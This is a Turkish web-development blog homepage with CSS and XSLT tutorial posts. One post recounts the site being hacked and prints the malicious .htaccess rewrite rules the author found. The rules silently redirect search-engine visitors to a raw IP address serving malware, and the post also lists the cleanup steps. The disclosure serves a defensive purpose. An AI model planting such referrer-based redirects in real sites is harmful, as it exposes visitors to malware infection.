<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="tr-TR">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="verify-v1" content="608TZcHSawljLQ7jYMNukx1WmAWzUhBh+rtkMCzm74o=" />
<title>Fatih Hayrioğlu&#8217;nun not defteri /  { CSS, XHTML ve Javascript }</title>
<link rel="stylesheet" href="/wp-content/themes/sansserif_racer/sansserif_racer/konstruktors.css" type="text/css" />
<link rel="stylesheet" href="/wp-content/themes/sansserif_racer/sansserif_racer/style.css" type="text/css" />
<!--[if lt IE 7.]><link rel="stylesheet" href="http://www.fatihhayrioglu.com/wp-content/themes/sansserif_racer/sansserif_racer/ie-fix.css" type="text/css" /><![endif]-->
<link rel="alternate" type="application/rss+xml" title="Fatih Hayrioğlu RSS Feed" href="http://feeds.feedburner.com/fatihhayri" />
<link rel="alternate" type="application/rss+xml" title="Web'den Seçme Haberler" href="http://feeds.delicious.com/v2/rss/fatihhayri" />
<link rel="shortcut icon" href="/wp-content/themes/sansserif_racer/sansserif_racer/favicon.ico" />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.fatihhayrioglu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.fatihhayrioglu.com/wp-includes/wlwmanifest.xml" /> 

<!-- Start Of Script Generated By WP-PageNavi 2.31 -->
<link rel="stylesheet" href="http://www.fatihhayrioglu.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css" type="text/css" media="screen" />
<!-- End Of Script Generated By WP-PageNavi 2.31 -->
<meta name="robots" content="index, follow" />

<meta name="description" content="Web standartları, CSS ve web teknolojileri &uuml;zerine notlar barındıran bir site" />
<meta name="keywords" content="CSS, CSS dersleri, XHTML, HTML, Fatih Hayrioğlu, Ajax, Asp.NET, VB.NET, Javascript, Web Master, Web Master Kaynakları, Web Haberleri" />
<title>Fatih Hayrioğlu'nun not defteri &raquo; { CSS, XHTML ve Javascript }</title>
	<link type="text/css" rel="stylesheet" href="http://www.fatihhayrioglu.com/wp-content/plugins/syntaxhighlighter/files/SyntaxHighlighter.css"></link>
</head>
<body>
<div id="soul"><div id="soul-content" class="bb-tbase">
<div id="header" class="bb-tbase">

<div class="bb-t18 bb-fa"><div class="bbin-c3">
<div class="logo"><strong><a href="/">Fatih Hayrioğlu'nun not defteri</a></strong>
<p class="slogan"><em>{ CSS, XHTML ve Javascript }</em></p>
</div>
</div></div>

<div id="nav-main" class="nav-h bb-t12 bb-fc">
		<ul>
			<li class="page_item page-item-2"><a href="http://www.fatihhayrioglu.com/hakkimda/" title="Hakkımda">Hakkımda</a></li>
<li class="page_item page-item-119"><a href="http://www.fatihhayrioglu.com/css-dersleri/" title="CSS Dersleri">CSS Dersleri</a></li>
<li class="page_item page-item-461"><a href="http://www.fatihhayrioglu.com/kitap/" title="Kitap">Kitap</a></li>
<li class="page_item page-item-643"><a href="http://www.fatihhayrioglu.com/lifestream/" title="Lifestream">Lifestream</a></li>
<li class="page_item page-item-633"><a href="http://www.fatihhayrioglu.com/iletisim/" title="İletişim">İletişim</a></li>
		</ul>
</div>
</div><!--header--><hr /><div class="bb-tbase">

<div id="content-main" class="bb-t18 bb-fa"><div class="bbin-c3">


<div class="post bb-tbase" id="post-781">

<div class="PostHead">

<h2 class="title"><a href="http://www.fatihhayrioglu.com/xslt-ipucu-bosluk-karakteri-kullanimi/" rel="bookmark" title="xslt ipucu: boşluk karakteri kullanımı">xslt ipucu: boşluk karakteri kullanımı</a></h2>
 <p class="PostDate">
   <strong class="day">26</strong>
   <strong class="month">Kas</strong>
 </p>
<p class="PostInfo">Yazı Fatih HAYRİOĞLU tarafından <em><a href="http://www.fatihhayrioglu.com/category/haberler/" title="Haberler kategorisindeki tüm yazıları göster" rel="category tag">Haberler</a></em> kategorisine eklendi. </p>
</div>				
<p>XSLT&#8217;de &nbsp; gibi boşluk karakteri verdiğimizde hata veriyor. Bunun bir çözümü olmalı diye bir çok kere aradım buldum, sonra yine lazım oldu yine aradım buldum ve en iyisi buraya yazmak diye düşündüm.</p>
<pre name="code" class="xslt">
&lt;xsl:text disable-output-escaping=&quot;yes&quot;&gt;&amp;amp;nbsp;&lt;/xsl:text&gt;
</pre>
<p>Kaynak: <a href="http://stackoverflow.com/questions/31870/using-a-html-entity-in-xslt-eg-nbsp">http://stackoverflow.com/questions/31870/using-a-html-entity-in-xslt-eg-nbsp</a></p>
<p class="yorum"><a href="http://www.fatihhayrioglu.com/xslt-ipucu-bosluk-karakteri-kullanimi/#comments" title="xslt ipucu: boşluk karakteri kullanımı için yapılan yorumlar"><strong>3</strong> yorum</a></p>
</div>

		
<div class="post bb-tbase" id="post-770">

<div class="PostHead">

<h2 class="title"><a href="http://www.fatihhayrioglu.com/hacklendik/" rel="bookmark" title="Hacklendik">Hacklendik</a></h2>
 <p class="PostDate">
   <strong class="day">18</strong>
   <strong class="month">Kas</strong>
 </p>
<p class="PostInfo">Yazı Fatih HAYRİOĞLU tarafından <em><a href="http://www.fatihhayrioglu.com/category/haberler/" title="Haberler kategorisindeki tüm yazıları göster" rel="category tag">Haberler</a></em> kategorisine eklendi. </p>
</div>				
<p>Bu gün siteme girmeye çalışan Firefox ve Google üzerinden girmeye çalışanların karşılaştığı bir sorun sitem zararlı içerik olduğu için engellenmiş. Aslında tüm arama sitelerinden gelen yönlendirmeler de aynı sorun varmış. En sonunda anladım. Uzun aramalar sonunda <a href="http://wordpress.org/support/topic/217700">http://wordpress.org/support/topic/217700</a> Bu linkdeki bilgiler doğrultusunda htcaacces içine girilen<br />
yönlendirme kodu nedeni ile yaşamışım bu sorunları.</p>
<p>Ayrıca yazılarımın için yerleştirilmiş bir iframe reklam linkeleri de var tabi.</p>
<p>Yukarıdaki linkdeki işlemleri tek tek yaptım</p>
<p>- htaccess dosyasını sildim.<br />
- ftp şifremi değiştirdim<br />
- hostingh firmamdan sitemin bulnduğu klasörü bir virüs, malware taramasından geçirmelerini istedim.</p>
<p>Sorunun ana nedeni htaccess dosyasında ki kodlar olarak görünüyor. Başta uzunca bir boşluktan sonra aşağıdaki kod yazıyordu.</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]<br />
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]</p>
<p>Bu arada cute ftp&#8217;de htaccess görüntülemeyide öğrendik.<br />
<a href="http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html">http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html</a></p>
<p>Muhtemelen sorun haftasonu benim kalıcı bağlantılarım gittinde oldu ve ben bunu anlamadım. Asıl sorunun ise sitemi yahoo.com&#8217;da aradığımda karşılaştım, linke tıkladığımda bilgisayarıma zararlı yazılım eklemeye çalıştı. Zaten yukarıdaki kodda da bu açıkça görülüyor, siteme direk girişlerde değilde arama sonuçlarından gelince yüklenmeye çalışıyor. Ama hesap edemedikleri şey google&#8217;un bunu görüp sitemi kapatması. Google&#8217;un ve Firefox&#8217;un sitemi engellemeleri daha bitmedi. Google Web Yöneticis aracındaki incelemeye alın işaret kutunu işaretledim  ve  StopBadware.org&#8217;daki formuda doldurdum. Neyse hayırlısı bakalım. </p>
<p>Bu durumu gören ve beni uyaran tüm arkadaşlara teşekkürler. Umarım bu tip sorunlarla bi daha karşılaşmayız.</p>
<h3 style="color:#f00">Ek olarak</h3>
<p>Ayrıca </p>
<p>http://www.fatihhayrioglu.com/?ref=siteAdi</p>
<p>gibi linkler var. Bunlarıda robots.txt</p>
<p>User-agent: *<br />
Disallow: /*ref=*<br />
Disallow: /*?ref=</p>
<p>kodlarını ekleyerek düzelttim. İşin ilginci bu linkleri google&#8217;un arama aracı nasıl buluyor.</p>
<p class="yorum"><a href="http://www.fatihhayrioglu.com/hacklendik/#comments" title="Hacklendik için yapılan yorumlar"><strong>26</strong> yorum</a></p>
</div>

		
<div class="post bb-tbase" id="post-760">

<div class="PostHead">

<h2 class="title"><a href="http://www.fatihhayrioglu.com/css-ile-resim-haritalariimagemap-yapmak/" rel="bookmark" title="CSS ile Resim Haritaları(imagemap) yapmak">CSS ile Resim Haritaları(imagemap) yapmak</a></h2>
 <p class="PostDate">
   <strong class="day">17</strong>
   <strong class="month">Kas</strong>
 </p>
<p class="PostInfo">Yazı Fatih HAYRİOĞLU tarafından <em><a href="http://www.fatihhayrioglu.com/category/haberler/" title="Haberler kategorisindeki tüm yazıları göster" rel="category tag">Haberler</a></em> kategorisine eklendi. </p>
</div>				
<p>Ben ilk defa Flickr&#8217;da(bir örnek verelim. <a title="Dexter HTML kesiyormuş." href="http://www.flickr.com/photos/mollyeh11/2720714668/" >Dexter HTML kesiyormuş.</a> :) gördüğüm bu metodu çok ilginç bulmuştum. Gerçekten kullanıcıya  yardımcı olan bir uygulama, görünümü hoş ve işlevsel. İlk gördüğümde bu  işin javascript yardımı ile yapıldığını düşünmüştüm ki araştırdığım da  gördüm ki javascript yardımı ile yapanlar var, ama sadece css ile bu  işi yapanlarda var. Bu konuyu araştırıp bir yazı yazmayı konuyu CSS  Mastery kitabında okuduğumda karar vermiştim, ancak olmadı nasip  şimdiye imiş. </p>
<p> <a href="http://www.fatihhayrioglu.com/css-ile-resim-haritalariimagemap-yapmak/#more-760" class="more-link">Okumaya devam et &raquo;</a></p>
<p class="yorum"><a href="http://www.fatihhayrioglu.com/css-ile-resim-haritalariimagemap-yapmak/#comments" title="CSS ile Resim Haritaları(imagemap) yapmak için yapılan yorumlar"><strong>12</strong> yorum</a></p>
</div>

		
<div class="post bb-tbase" id="post-758">

<div class="PostHead">

<h2 class="title"><a href="http://www.fatihhayrioglu.com/css-ile-basit-sekilde-fare-uzerine-gelincerollover-resim-degisimi-yapmak/" rel="bookmark" title="CSS ile Basit Şekilde Fare Üzerine Gelince(Rollover) Resim Değişimi Yapmak">CSS ile Basit Şekilde Fare Üzerine Gelince(Rollover) Resim Değişimi Yapmak</a></h2>
 <p class="PostDate">
   <strong class="day">10</strong>
   <strong class="month">Kas</strong>
 </p>
<p class="PostInfo">Yazı Fatih HAYRİOĞLU tarafından <em><a href="http://www.fatihhayrioglu.com/category/css/" title="CSS kategorisindeki tüm yazıları göster" rel="category tag">CSS</a>,  <a href="http://www.fatihhayrioglu.com/category/web-standartlari/" title="Web Standartları kategorisindeki tüm yazıları göster" rel="category tag">Web Standartları</a>,  <a href="http://www.fatihhayrioglu.com/category/xhtml/" title="XHTML kategorisindeki tüm yazıları göster" rel="category tag">XHTML</a></em> kategorisine eklendi. </p>
</div>				
<p>Daha önce bu konuya <a title="Resimli Menüler" href="http://www.fatihhayrioglu.com/css-ile-menu-olusturmak-v-resimli-menuler" >Resimli Menüler</a> kısmında anlatmıştım, ama orada yapı daha karışık olduğu için  anlaşılması ve basit uygulamalara uyarlanması konusunda sıkıntılar  oluyordu. Bu işi daha basit bir örnek yardımı ile yapıp daha anlaşılır  yapmak için beraber bir örnek yapalım.</p>
<p>Tek resimde işi  halletmemiz, resmin sayfa yüklenmesinden önce yüklenmesi sebebiyle fare  üzerine geldiğinde herhangi bir resim yükleme işlemini beklemediğimiz  için daha akıcı olduğu gibi avantajlarını olduğunu daha önce  anlatmıştık.</p>
<p>İlk olarak fare imlecinin üzerine geldiğinde  değişecek resmin her iki hali yanyana gelecek şekilde yan yana veya alt  alta gelecek şekilde tek resim olarak hazırlıyoruz(aradaki çizgiyi iki  resim arasındaki ayrımı göstermek için koydum, normal resimde bu  olmayacak)</p>
<p><img src="/images/mak_degisen_resim.gif" alt="anasayfaya dön"></p>
<p>Xhtml kodumuzu yazalım</p>
<pre name="code" class="html">
&lt;a class=&quot;anasayfayaDon&quot; href=&quot;anasayfa.htm&quot;&gt;Ana Sayfaya Dön&lt;/a&gt;
</pre>
<p>CSS kodumuzu yazalım</p>
<pre name="code" class="css">
a.anasayfayaDon {
    display: block;
    width: 80px;
    height: 80px;
    background: url(images/degisen_resim.gif) 0 0 no-repeat;
    text-decoration: none;
    text-indent:-999px;
}

a:hover.anasayfayaDon {
    background-position: -80px 0;
}
</pre>
<p>Yöntemi  daha önce anlattığımız gibi ardalan kaydırmaca yöntemidir.  Hazırladığımız ardalan resminin ilk olarak istediğimiz kısmını  gösteriyoruz. Fare imleci üzerine geldiğinde ise yatayda aynı eksende  bulunan başlangıçta görünmeyen resmi eksi konum vererek gösteriyoruz.</p>
<p>Örnek sayfayı görmek için <a href="/dokumanlar/fare_degisen_resim.html">tıklayınız</a></p>
<p class="yorum"><a href="http://www.fatihhayrioglu.com/css-ile-basit-sekilde-fare-uzerine-gelincerollover-resim-degisimi-yapmak/#comments" title="CSS ile Basit Şekilde Fare Üzerine Gelince(Rollover) Resim Değişimi Yapmak için yapılan yorumlar"><strong>12</strong> yorum</a></p>
</div>

		
<div class="post bb-tbase" id="post-746">

<div class="PostHead">

<h2 class="title"><a href="http://www.fatihhayrioglu.com/css-ile-yuzde-cubugu-hazirlama/" rel="bookmark" title="CSS ile Yüzde Çubuğu Hazırlama">CSS ile Yüzde Çubuğu Hazırlama</a></h2>
 <p class="PostDate">
   <strong class="day">6</strong>
   <strong class="month">Kas</strong>
 </p>
<p class="PostInfo">Yazı Fatih HAYRİOĞLU tarafından <em><a href="http://www.fatihhayrioglu.com/category/css/" title="CSS kategorisindeki tüm yazıları göster" rel="category tag">CSS</a>,  <a href="http://www.fatihhayrioglu.com/category/xhtml/" title="XHTML kategorisindeki tüm yazıları göster" rel="category tag">XHTML</a></em> kategorisine eklendi. </p>
</div>				
<p>Yüzde  çubuğuna ben anket yaparken ihtiyaç duydum. CSS ile yüzde çubuğu yapmak  bize çok büyük kolaylık sağlıyor. Diğer yöntemlere göre daha esnek ve  kolay bir uygulamaya sahiptir CSS ile yüzde çubuğu hazırlamak.</p>
<p>CSS ile yüzde çubuğu yapmanın bir kaç yöntemi var, ben kendimce en uygun gördüğümü anlatacağım.</p>
<p>Bu  yöntemin uygulaması gayet basittir. Diğer yöntemlerden avantajıda  fazladan kod kullanılmamasıdır, sadece iki resim ile işimizi  halledeceğiz. Anlamlı kodlama açısından avantajlıdır.</p>
<p> <a href="http://www.fatihhayrioglu.com/css-ile-yuzde-cubugu-hazirlama/#more-746" class="more-link">Okumaya devam et &raquo;</a></p>
<p class="yorum"><a href="http://www.fatihhayrioglu.com/css-ile-yuzde-cubugu-hazirlama/#comments" title="CSS ile Yüzde Çubuğu Hazırlama için yapılan yorumlar"><strong>15</strong> yorum</a></p>
</div>

		
<div class="post bb-tbase" id="post-740">

<div class="PostHead">

<h2 class="title"><a href="http://www.fatihhayrioglu.com/en-cok-kullandigim-css-hilelerihack/" rel="bookmark" title="En çok kullandığım CSS Hileleri(Hack)">En çok kullandığım CSS Hileleri(Hack)</a></h2>
 <p class="PostDate">
   <strong class="day">3</strong>
   <strong class="month">Kas</strong>
 </p>
<p class="PostInfo">Yazı Fatih HAYRİOĞLU tarafından <em><a href="http://www.fatihhayrioglu.com/category/css/" title="CSS kategorisindeki tüm yazıları göster" rel="category tag">CSS</a>,  <a href="http://www.fatihhayrioglu.com/category/web-standartlari/" title="Web Standartları kategorisindeki tüm yazıları göster" rel="category tag">Web Standartları</a>,  <a href="http://www.fatihhayrioglu.com/category/xhtml/" title="XHTML kategorisindeki tüm yazıları göster" rel="category tag">XHTML</a></em> kategorisine eklendi. </p>
</div>				
<p>Yaklaşık  3-4 senedir css ile web sayfası kodluyorum. CSS ile web sayfası  kodlarken en çok sorun çıkaran konulardan biri farklı tarayıcılar için  kod yazmaktır. CSS hileleri ile geçiştirdiğimiz bu farklı tarayıcılara  göre kod yazma işi bize aslında CSS ile sayfa kodlama imkanı sunması  bakımından önemlidir. Eğer CSS hileleri olması idi biz farklı  tarayıcılar için değil belirli tarayıcılar için kod yazmış olacaktık ki  bu erişebilirlik açısından ve müşteri istekleri açısından sorun  oluşturan bir durumdur. </p>
<p>Başta dediğim gibi 3-4 senedir CSS ile  sayfa kodluyorum ve en çok kullandığım css hilelerini burada yazmamın  uygun olacağını düşündüm. Çünkü birçok bu işi yeni başlayan arkadaş  için önemli bir bilgi olacağını düşünüyorum. Lafı fazla uzatmadan  listemiz açıklayalım.</p>
<p> <a href="http://www.fatihhayrioglu.com/en-cok-kullandigim-css-hilelerihack/#more-740" class="more-link">Okumaya devam et &raquo;</a></p>
<p class="yorum"><a href="http://www.fatihhayrioglu.com/en-cok-kullandigim-css-hilelerihack/#comments" title="En çok kullandığım CSS Hileleri(Hack) için yapılan yorumlar"><strong>13</strong> yorum</a></p>
</div>

			
	<div class="bb-tbase nav-entry-pages">
		<p class="bb-t10 bb-fa"><div class="wp-pagenavi">
<span class="pages">Sayfa 1 - 76</span><span class="current">1</span><a href="http://www.fatihhayrioglu.com/page/2/" title="2">2</a><a href="http://www.fatihhayrioglu.com/page/3/" title="3">3</a><a href="http://www.fatihhayrioglu.com/page/4/" title="4">4</a><a href="http://www.fatihhayrioglu.com/page/5/" title="5">5</a><a href="http://www.fatihhayrioglu.com/page/2/">&raquo;</a><span class="extend">...</span><a href="http://www.fatihhayrioglu.com/page/76/" title="Son &raquo;">Son &raquo;</a></div>
</p>
	</div>
	
	
</div></div>

<div id="content-sub" class="bb-t12 bb-fc"><div class="bbin-a1">
<div id="rss"><a href="http://feeds.feedburner.com/fatihhayri" title="Siteme abone ol"><img src="/images/rss_ikon.gif" border="0" /></a></div><form action="http://www.fatihhayrioglu.com/arama" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="004780390133711217154:ljzeact7g-o" />
    <input type="hidden" name="cof" value="FORID:11;NB:1" />
    <input type="hidden" name="ie" value="UTF-8" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Ara" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=tr"></script>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=tr"></script>



	<div class="bb-tbase"><div id="delicious-1" class="widget widget_delicious"><h4><span>Web'den Seçme Haberler</span></h4><ul class="delicious"><li class="delicious-item"><span class="delicious-desc"><a href="http://nettuts.com/tutorials/html-css-techniques/10-challenging-but-awesome-css-techniques/" class="delicious-link">10 büyüleyici CSS tekniği</a></span> <span class="delicious-timestamp"><abbr title="2008/11/26 04:02:33">26.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/web" class="delicious-link-tag">web</a> <a href="http://del.icio.us/fatihhayri/menu" class="delicious-link-tag">menu</a> <a href="http://del.icio.us/fatihhayri/javascript" class="delicious-link-tag">javascript</a> <a href="http://del.icio.us/fatihhayri/html" class="delicious-link-tag">html</a> <a href="http://del.icio.us/fatihhayri/css" class="delicious-link-tag">css</a> <a href="http://del.icio.us/fatihhayri/makale" class="delicious-link-tag">makale</a> <a href="http://del.icio.us/fatihhayri/ipuçları" class="delicious-link-tag">ipuçları</a> <a href="http://del.icio.us/fatihhayri/web-tasarımı" class="delicious-link-tag">web-tasarımı</a> <a href="http://del.icio.us/fatihhayri/web-programlama" class="delicious-link-tag">web-programlama</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://cnetturkiye.com/haberler/1807" class="delicious-link">Internet&#039;te ÖİV yüzde 15&#039;ten yüzde 5&#039;e iniyor.</a></span> <span class="delicious-timestamp"><abbr title="2008/11/26 03:59:31">26.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/internet" class="delicious-link-tag">internet</a> <a href="http://del.icio.us/fatihhayri/öiv" class="delicious-link-tag">öiv</a> <a href="http://del.icio.us/fatihhayri/indirim" class="delicious-link-tag">indirim</a> <a href="http://del.icio.us/fatihhayri/fiyat" class="delicious-link-tag">fiyat</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://developer.yahoo.com/yslow/" class="delicious-link">Firebug için Yslow kullanımı hakkında bir makale</a></span> <span class="delicious-timestamp"><abbr title="2008/11/26 03:54:41">26.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/firefox" class="delicious-link-tag">firefox</a> <a href="http://del.icio.us/fatihhayri/firebug" class="delicious-link-tag">firebug</a> <a href="http://del.icio.us/fatihhayri/html" class="delicious-link-tag">html</a> <a href="http://del.icio.us/fatihhayri/javascript" class="delicious-link-tag">javascript</a> <a href="http://del.icio.us/fatihhayri/web" class="delicious-link-tag">web</a> <a href="http://del.icio.us/fatihhayri/araç" class="delicious-link-tag">araç</a> <a href="http://del.icio.us/fatihhayri/test" class="delicious-link-tag">test</a> <a href="http://del.icio.us/fatihhayri/yahoo" class="delicious-link-tag">yahoo</a> <a href="http://del.icio.us/fatihhayri/yslow" class="delicious-link-tag">yslow</a> <a href="http://del.icio.us/fatihhayri/web-programlama" class="delicious-link-tag">web-programlama</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://www.sitepoint.com/article/terrific-tables-css/" class="delicious-link">CSS ile güzel görünümlü tablo oluşturmak</a></span> <span class="delicious-timestamp"><abbr title="2008/11/26 03:53:57">26.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/xhtml" class="delicious-link-tag">xhtml</a> <a href="http://del.icio.us/fatihhayri/web" class="delicious-link-tag">web</a> <a href="http://del.icio.us/fatihhayri/table" class="delicious-link-tag">table</a> <a href="http://del.icio.us/fatihhayri/javascript" class="delicious-link-tag">javascript</a> <a href="http://del.icio.us/fatihhayri/w3c" class="delicious-link-tag">w3c</a> <a href="http://del.icio.us/fatihhayri/makale" class="delicious-link-tag">makale</a> <a href="http://del.icio.us/fatihhayri/web-geliştirme" class="delicious-link-tag">web-geliştirme</a> <a href="http://del.icio.us/fatihhayri/web-programlama" class="delicious-link-tag">web-programlama</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://www.internethaber.com/news_detail.php?id=167180" class="delicious-link">Telefonsuz ADSL dönemi</a></span> <span class="delicious-timestamp"><abbr title="2008/11/25 03:54:25">25.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/adsl" class="delicious-link-tag">adsl</a> <a href="http://del.icio.us/fatihhayri/internet" class="delicious-link-tag">internet</a> <a href="http://del.icio.us/fatihhayri/telefonsuz" class="delicious-link-tag">telefonsuz</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://mashable.com/2008/11/20/quit-smoking/" class="delicious-link">Sigarayı bırakmamıza yardım edecek 9 kaynak</a></span> <span class="delicious-timestamp"><abbr title="2008/11/25 03:54:10">25.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/sigaraya-hayır" class="delicious-link-tag">sigaraya-hayır</a> <a href="http://del.icio.us/fatihhayri/kanser" class="delicious-link-tag">kanser</a> <a href="http://del.icio.us/fatihhayri/ölüm" class="delicious-link-tag">ölüm</a> <a href="http://del.icio.us/fatihhayri/zararlı" class="delicious-link-tag">zararlı</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://herr-schuessler.de/blog/jquerypopeye-an-inline-lightbox-alternative/" class="delicious-link">jQuery alt yapısı kullanılarak oluşturulmuş farklı bir lightbox uygulaması</a></span> <span class="delicious-timestamp"><abbr title="2008/11/23 11:30:19">23.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/slideshow" class="delicious-link-tag">slideshow</a> <a href="http://del.icio.us/fatihhayri/lightbox" class="delicious-link-tag">lightbox</a> <a href="http://del.icio.us/fatihhayri/jquery" class="delicious-link-tag">jquery</a> <a href="http://del.icio.us/fatihhayri/javascript" class="delicious-link-tag">javascript</a> <a href="http://del.icio.us/fatihhayri/web" class="delicious-link-tag">web</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://www.youtube.com/user/Live" class="delicious-link">Youtube yaklaşık 3 saat sonra canlı yayın yapmamıza olanak sağlayacakmış</a></span> <span class="delicious-timestamp"><abbr title="2008/11/22 16:21:01">22.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/youtube" class="delicious-link-tag">youtube</a> <a href="http://del.icio.us/fatihhayri/video" class="delicious-link-tag">video</a> <a href="http://del.icio.us/fatihhayri/tv" class="delicious-link-tag">tv</a> <a href="http://del.icio.us/fatihhayri/canlı" class="delicious-link-tag">canlı</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://www.webdesignerdepot.com/2008/11/dos-and-donts-of-large-website-backgrounds/" class="delicious-link">Geniş ardalan resimi kullanırken neleri yapmalıyız neleri yapmamalıyız. Güzel ve bilgilendirici bir makale</a></span> <span class="delicious-timestamp"><abbr title="2008/11/22 16:05:33">22.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/css" class="delicious-link-tag">css</a> <a href="http://del.icio.us/fatihhayri/ardalan" class="delicious-link-tag">ardalan</a> <a href="http://del.icio.us/fatihhayri/büyük" class="delicious-link-tag">büyük</a> <a href="http://del.icio.us/fatihhayri/web-programlama" class="delicious-link-tag">web-programlama</a> </div></li><li class="delicious-item"><span class="delicious-desc"><a href="http://tv.adobe.com/#vi+f1594v1013" class="delicious-link">Fireworks cs 4 hakkında güzel bir video</a></span> <span class="delicious-timestamp"><abbr title="2008/11/22 06:16:08">22.11.2008</abbr></span><br /><div class="delicious-tags"><a href="http://del.icio.us/fatihhayri/adobe" class="delicious-link-tag">adobe</a> <a href="http://del.icio.us/fatihhayri/fireworks" class="delicious-link-tag">fireworks</a> <a href="http://del.icio.us/fatihhayri/resim" class="delicious-link-tag">resim</a> <a href="http://del.icio.us/fatihhayri/düzenleme" class="delicious-link-tag">düzenleme</a> </div></li></ul><p class=tumHaberler><a href=http://delicious.com/fatihhayri>Tüm haberleri göster</a></p></div><div id="tag_cloud" class="widget widget_tag_cloud"><h4><span>Etiket Bulutu</span></h4><a href='http://www.fatihhayrioglu.com/tag/internet-tarayicisi/' class='tag-link-583' title='11 topics' rel="tag" style='font-size: 8.3456790123457pt;'>İnternet Tarayıcısı</a>
<a href='http://www.fatihhayrioglu.com/tag/adobe/' class='tag-link-129' title='7 topics' rel="tag" style='font-size: 8pt;'>adobe</a>
<a href='http://www.fatihhayrioglu.com/tag/ajax/' class='tag-link-2' title='33 topics' rel="tag" style='font-size: 10.246913580247pt;'>Ajax</a>
<a href='http://www.fatihhayrioglu.com/tag/arama-motoru/' class='tag-link-287' title='10 topics' rel="tag" style='font-size: 8.2592592592593pt;'>arama motoru</a>
<a href='http://www.fatihhayrioglu.com/tag/aspnet/' class='tag-link-6' title='20 topics' rel="tag" style='font-size: 9.1234567901235pt;'>ASP.NET</a>
<a href='http://www.fatihhayrioglu.com/tag/background/' class='tag-link-143' title='8 topics' rel="tag" style='font-size: 8.0864197530864pt;'>background</a>
<a href='http://www.fatihhayrioglu.com/tag/css/' class='tag-link-3' title='169 topics' rel="tag" style='font-size: 22pt;'>CSS</a>
<a href='http://www.fatihhayrioglu.com/tag/css30/' class='tag-link-256' title='13 topics' rel="tag" style='font-size: 8.5185185185185pt;'>css3.0</a>
<a href='http://www.fatihhayrioglu.com/tag/dreamweaver/' class='tag-link-209' title='12 topics' rel="tag" style='font-size: 8.4320987654321pt;'>Dreamweaver</a>
<a href='http://www.fatihhayrioglu.com/tag/firebug/' class='tag-link-268' title='18 topics' rel="tag" style='font-size: 8.9506172839506pt;'>firebug</a>
<a href='http://www.fatihhayrioglu.com/tag/firefox/' class='tag-link-18' title='43 topics' rel="tag" style='font-size: 11.111111111111pt;'>Firefox</a>
<a href='http://www.fatihhayrioglu.com/tag/firefox-3/' class='tag-link-698' title='9 topics' rel="tag" style='font-size: 8.1728395061728pt;'>Firefox 3</a>
<a href='http://www.fatihhayrioglu.com/tag/float/' class='tag-link-193' title='13 topics' rel="tag" style='font-size: 8.5185185185185pt;'>float</a>
<a href='http://www.fatihhayrioglu.com/tag/font/' class='tag-link-142' title='11 topics' rel="tag" style='font-size: 8.3456790123457pt;'>font</a>
<a href='http://www.fatihhayrioglu.com/tag/form/' class='tag-link-292' title='8 topics' rel="tag" style='font-size: 8.0864197530864pt;'>form</a>
<a href='http://www.fatihhayrioglu.com/tag/google/' class='tag-link-20' title='32 topics' rel="tag" style='font-size: 10.16049382716pt;'>google</a>
<a href='http://www.fatihhayrioglu.com/tag/google-analytics/' class='tag-link-79' title='7 topics' rel="tag" style='font-size: 8pt;'>Google Analytics</a>
<a href='http://www.fatihhayrioglu.com/tag/google-maps/' class='tag-link-33' title='7 topics' rel="tag" style='font-size: 8pt;'>google maps</a>
<a href='http://www.fatihhayrioglu.com/tag/google-reader/' class='tag-link-48' title='11 topics' rel="tag" style='font-size: 8.3456790123457pt;'>google reader</a>
<a href='http://www.fatihhayrioglu.com/tag/haberler/' class='tag-link-1' title='92 topics' rel="tag" style='font-size: 15.345679012346pt;'>Haberler</a>
<a href='http://www.fatihhayrioglu.com/tag/html/' class='tag-link-154' title='12 topics' rel="tag" style='font-size: 8.4320987654321pt;'>html</a>
<a href='http://www.fatihhayrioglu.com/tag/ie/' class='tag-link-26' title='13 topics' rel="tag" style='font-size: 8.5185185185185pt;'>ie</a>
